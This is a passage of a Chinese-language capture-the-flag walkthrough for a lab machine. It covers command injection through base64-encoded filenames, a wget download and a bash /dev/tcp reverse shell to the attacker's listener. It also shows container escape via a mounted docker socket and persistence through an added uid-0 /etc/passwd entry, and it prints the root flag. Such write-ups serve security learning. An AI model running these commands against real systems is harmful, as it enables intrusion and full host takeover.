step4 = req.get(url+"~/api/get_ls?path=/tmp/"+payload, headers=headers)

不过为啥不能执行，猜测可能进行了过滤

所以我们尝试修改一下反弹shell的命令，看看能否执行

首先修改一下文件夹权限

然后尝试修改/tmp目录下的POC文件名中的base64值，改为wget 172.17.0.1:8000/user.txt -O /tmp/user.txt的base64

同时靶机上开一下http服务，发现命令是可以被执行的

1
2
3

matrioshka@matrioshka:~$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
172.19.0.2 - - [09/Mar/2025 09:27:50] "GET /user.txt HTTP/1.1" 200 -

利用wget将rev.php下到/tmp目录下

matrioshka@matrioshka:~$ vi rev.sh
/bin/bash -i >& /dev/tcp/172.19.0.1/4444 0>&1
matrioshka@matrioshka:~$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
172.19.0.2 - - [09/Mar/2025 09:36:58] "GET /rev.sh HTTP/1.1" 200 -

虽然说你访问rev.php他不会解析，但你直接在Dcoker中用bash执行命令就可以了

1 2	❯ echo -n "bash /tmp/rev.sh"\|base64 YmFzaCAvdG1wL3Jldi5zaA==

Root提权

监听端口，成功拿到docker shell

matrioshka@matrioshka:~$ busybox nc -lp 4444
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@39cfe3c81ea8:~/.hfs# id
id
uid=0(root) gid=0(root) groups=0(root)
root@39cfe3c81ea8:~/.hfs#  ls -al
ls -al
total 28
drwxr-xr-x 4 root root 4096 Mar  9 13:27 .
drwx------ 1 root root 4096 Mar  9 08:28 ..
-rw-r--r-- 1 root root   32 Mar  9 12:29 custom.html
-rw-r--r-- 1 root root  402 Mar  9 12:27 debug.log
drwxr-xr-x 2 root root 4096 Mar  9 08:28 logs
drwxr-xr-x 2 root root 4096 Mar  9 08:28 plugins
-rw-r--r-- 1 root root   33 Aug 22  2024 user.txt

然而我找了好久，啥信息也没有

Docker 提权

最后发现docker中装了docker

其中运行了三个容器，有一个是Ubuntu的容器，观察了一下容器ID

哎，不就是当前的容器吗39cfe3c81ea8

root@39cfe3c81ea8:~/.hfs# docker ps
docker ps
CONTAINER ID   IMAGE          COMMAND                  CREATED        STATUS       PORTS                    NAMES
39cfe3c81ea8   ubuntu:20.04   "/bin/bash -c 'apt-g…"   6 hours ago    Up 6 hours   127.0.0.1:9090->80/tcp   docker-hfs_hfs_1
8485358c3c48   mysql:8.0.0    "docker-entrypoint.s…"   6 months ago   Up 6 hours   3306/tcp                 docker-wp_db_1
3ed5ddfe0e0c   wordpress      "docker-entrypoint.s…"   6 months ago   Up 6 hours   127.0.0.1:8080->80/tcp   docker-wp_wordpress_1

尝试利用docker提权，运行一个新的容器并将根目录切换到宿主机的根目录

发现root flag

root@39cfe3c81ea8:~/.hfs# docker run -v /:/mnt --rm -it ubuntu:20.04 chroot /m>
# id
uid=0(root) gid=0(root) groups=0(root)
# hostname
08e9a3ae7c84
# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
15: eth0@if16: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
    link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0
       valid_lft forever preferred_lft forever
# ss -luntp
Netid  State  Recv-Q  Send-Q   Local Address:Port   Peer Address:Port  Process
# cd /root
# ls
root.txt
# cat root.txt
7f5d6dbbaff0a1fc6d2a5c9160362908

后来我了解到并不是docker容器里面又装了一个docker，而是挂载了docker套接字

root@matrioshka:/home/matrioshka# docker inspect 39
   "Volumes": {
                "/opt/hfs/config.yaml": {},
                "/opt/hfs/data": {},
                "/opt/hfs/hfs-linux.zip": {},
                "/var/run/docker.sock": {}
            },

不然这样性能损失太严重了

你的宿主机（Host）已经安装了 Docker，Docker 通过 dockerd 进程提供 Docker API。

你的容器内 并没有真正运行一个 Docker 守护进程（dockerd），而是 直接使用宿主机的 Docker，相当于你的容器变成了一个 Docker 客户端。

优点
✅ 轻量：不需要在容器内运行 dockerd
✅ 兼容性好：不会破坏宿主机的 Docker 体系
✅ 权限高：直接控制宿主机上的 Docker

缺点
❌ 安全性风险：容器 拥有宿主机 Docker 的完全控制权限，如果被攻击，黑客可以控制宿主机所有容器！
❌ 不能真正运行 Docker 守护进程，只是作为客户端使用宿主机的 Docker API。

可以增加一个root用户到passwd这样就可以提升到root shell，当然docker shell基本上也等同于root shell

# echo "primary:zSZ7Whrr8hgwY:0:0::/root:/bin/bash" >>/etc/passwd
# exit
root@39cfe3c81ea8:~/.hfs# exit
exit
matrioshka@matrioshka:~$
logout
      Connection to 192.168.60.236 closed.
❯ ssh matrioshka@$ip
[email protected]'s password:
Linux matrioshka 6.1.0-23-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.99-1 (2024-07-15) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Mar  9 10:21:07 2025 from 192.168.60.100
matrioshka@matrioshka:~$ su primary
Password:
root@matrioshka:/home/matrioshka# id
uid=0(root) gid=0(root) groups=0(root)
root@matrioshka:/home/matrioshka#